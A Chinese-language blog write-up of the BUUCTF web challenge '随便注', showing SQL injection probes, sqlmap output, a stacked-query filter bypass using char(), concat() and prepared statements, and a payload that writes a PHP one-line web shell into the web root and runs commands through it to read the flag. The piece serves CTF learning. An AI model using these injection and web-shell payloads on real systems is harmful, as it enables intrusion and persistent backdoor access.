【Writeup】BUUCTF_Web_随便注

最新推荐文章于 2024-05-16 07:20:57 发布
最新推荐文章于 2024-05-16 07:20:57 发布
阅读量4.4k 收藏 10
点赞数 7
分类专栏: BUUCTF - Writeups 文章标签: CTF Web Writeup SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38100569/article/details/99617762
版权

0x01 解题思路

  • 打开页面,显然考点是SQL注入:

在这里插入图片描述

  • 手工测试一下:

​ ​ ?inject='

在这里插入图片描述

​ ​ ?inject=' or 1#

在这里插入图片描述

​ ​ ?inject=' or 0#

在这里插入图片描述

  • 可以进行基于布尔的盲注。注释里有这么一句话:

在这里插入图片描述

  • 先用sqlmap常规扫描试试:
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: inject (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: inject=1' AND 7855=7855 AND 'yWjT'='yWjT

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: inject=1' AND SLEEP(5) AND 'ToTd'='ToTd
---
16:33:21] [INFO] retrieved: 10.3.15-MariaDB
web application technology: PHP 7.3.5, OpenResty
back-end DBMS: MySQL >= 5.0.12
banner: '10.3.15-MariaDB'
[16:33:33] [INFO] fetching current user
[16:33:33] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[16:33:42] [INFO] fetching current database
[16:33:42] [INFO] retrieved: supersqli
current database: 'supersqli'
[16:33:49] [INFO] fetching server hostname
[16:33:49] [INFO] retrieved: 869ae49963bb
hostname: '869ae49963bb'
[16:33:59] [INFO] testing if current user is DBA
[16:33:59] [INFO] fetching current user
current user is DBA: False
[16:33:59] [INFO] fetching database users
[16:33:59] [INFO] fetching number of database users
[16:33:59] [INFO] retrieved: 
[16:34:00] [INFO] retrieved:
  • SQLMAP找到的注入点即为布尔盲注,返回以上信息之后就无法进行了,应该是进行了过滤。尝试一下常用关键词如select:

在这里插入图片描述

  • 过滤了注入常用的关键词。但是尝试一下堆叠注入发现可以

​ ​ ?inject=';show tables;#

在这里插入图片描述

  • 接下来就是利用堆叠注入能够多次执行语句的特性,想办法绕过过滤,查看表中内容了。

0x02 绕过关键词过滤

​ ​ 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)。本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕过过滤,因此想到利用字符串转换与拼接构造语句最后执行,这时就可以使用预处理语句。

  • 预处理语句使用方式:
PREPARE sqla from '[my sql sequece]';   //预定义SQL语句
EXECUTE sqla;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句
  • 预定义语句也可以通过变量进行传递,比如:
SET @tn = 'hahaha';  //存储表名
SET @sql = concat('select * from ', @tn);  //存储SQL语句
PREPARE sqla from @sql;   //预定义SQL语句
EXECUTE sqla;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

​ ​ 本题即可利用char()方法将ASCII码转换为SELECT字符串,接着利用concat()方法进行拼接获得查询的SQL语句,最后执行即可,payload如下:

?inject=';SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");PREPARE sqla from @sql;EXECUTE sqla;#

在这里插入图片描述

0x03 利用命令执行GetFlag

​​ ​ 由于用户是root,所以还可以通过命令执行的方式获取flag:BUUCTF-WEB题解#随便注

​ payload如下:

/?inject=';Set @sql=concat("s","elect '<?php @print_r(`$_GET[1]`);?>' into outfile '/var/www/html/1",char(46),"php'");PREPARE sqla from @sql;EXECUTE sqla;

/1.php?1=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"
  • 利用concat将select拆分从而绕过关键词select过滤
  • 利用char将ASCII码46转换为.从而绕过关键词.过滤
  • 利用MySQL into outputfile给网站留后门:利用Mysql into outfile给网站留后门(这里猜测绝对路径是一般ubuntu服务器网站根目录/var/www/html
  • 利用一句话木马执行任意mysql命令(反引号中的内容会被当做bash命令执行然后结果再传回来执行)
BAKUMANSEC
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUctf笔记
qq_36571229的博客
06-24 127
开贴刷题
[BUUCTF]-N1BOOK-[第一章 web入门]SQL入-1 及sqlmap的简单使用
yzl_007的博客
08-28 1468
[第一章 web入门]SQL入-1 及sqlmap的简单使用 跟着题目来学习一下sqlmap的简单使用 首先?id=1是如下结果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ked8spa3-1630160772569)(https://i.loli.net/2021/08/28/Oemn9syKg1lEcxS.png)] id=1’ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HsULWnzZ-1630160772571)(https
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84247617的博客
05-16 976
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
sqlmap简介
taozpwater的专栏
03-30 1万+
1、简介     sqlmap是一个自动化的SQL入工具,其主要功能是扫描,发现并利用给定的URL的SQL入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL入技术,分别是:
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 589
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2614
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合入(un...
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
ADS Writeup_2_ads_
10-02
在“Advanced Data Structure Writeup_2_ads_”这个主题中,我们主要探讨的是高级数据结构的相关概念、应用和实现。数据结构是计算机科学中的一个重要领域,它研究如何组织和存储数据,以便更有效地进行访问和操作。...
writeup_knkl_
09-30
【标题】"writeup_knkl_" 暗示了这是一个关于技术分析或漏洞报告的文档,其中"knkl"可能是某种缩写,可能代表一个特定的技术、工具或概念。由于描述部分"Raghav abnsaklfmleamafl;emgl;aeg"看起来像是随机字符序列,...
ADS Writeup_1_ads_
09-29
《高级数据结构解析1》(ADS Writeup_1)是一篇深入探讨高级数据结构的分析报告,主要聚焦于这些结构在计算机科学中的重要性、应用以及优化策略。数据结构是编程和算法设计的基础,它影响着程序的效率、可读性和可...
BUUCTF[强网杯 2019]随便 的三种解法
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF-web-随便
nareku的博客
07-06 1170
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
SQLMAP 脚本自动入应用(burpsuit辅助)
热门推荐
4ct10n
08-06 3万+
一道nctf的入题目 具体的步骤如下: sqlmap入命令1 sqlmap入命令2第一步 burpsuit获取报头运用burpsuit抓包,获取http报头 GET /services.php?id=4 HTTP/1.1 Host: www.backstagecommerce.ca Cache-Control: max-age=0 Upgrade-Insecure-Requests:
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 749
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF——随便
weixin_45864041的博客
09-21 745
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行入,所以我们换一个思路,看一看是否可以进行堆叠入 通过上面的测试可以看到,可以进行堆叠入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
BUUCTF【Web】随便(SQL入)
qq_70434663的博客
03-02 532
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值